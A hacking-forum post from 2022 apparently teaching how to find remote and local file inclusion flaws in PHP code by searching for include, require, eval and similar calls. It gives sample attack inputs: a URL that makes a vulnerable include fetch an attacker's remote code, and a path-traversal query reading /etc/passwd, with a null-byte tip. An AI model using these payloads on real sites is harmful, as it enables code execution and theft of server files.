ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 1785

tut how to Find RFI & LFI Vulnerability Static analysis

by the1Domo - 03-15-2022 - 07:48 PM
#1
tut how to Find RFI & LFI Vulnerability Static analysis by Domo

Open all of the PHP files in "WinRAR"; at the top go to "Find", Then

File names to find "*" string to find and Search for:
"require"
"require_once"
"include"
"include_once"
"$_GET"
"'.php';"
" ".php";"
"require_once($"
"readfile"
"system"
"eval"

For RFI vulnerabilities find:
include($test_path . "/test.php");
include $test_path . '.php';

If an attacker can control the value of the test_path variable;
they can replace it with something like "http://example.com/test.php?test="
or "http://test.com/test.php?test_path=" and, instead of picking up test.php
from the local filesystem, PHP will happily reach out across the net to pick
up the attacker's code. One of the ways that an attacker can control the value
of a variable in a PHP program is through the use of the register_globals PHP
mis-feature.

For LFI vulnerabilities find:
include '/pages/'.$pagina;

Now we can include a local files by URL...
"http:///example.php?pagina=../../../../../../etc/passwd"

How The script will include "/pages/../../../../../../etc/passwd" successfully.
Sometimes u have to use a null byte example "%00":

readfile($pagina);

The readfile() function will Allows you to read a local file on a server
"http:///example.php?pagina=../../../../../../etc/passwd"

Sometimes u have to use a null byte example "%00":
if you like my posts and want to see more please plus rep
Reply

Users browsing: 4 Guest(s)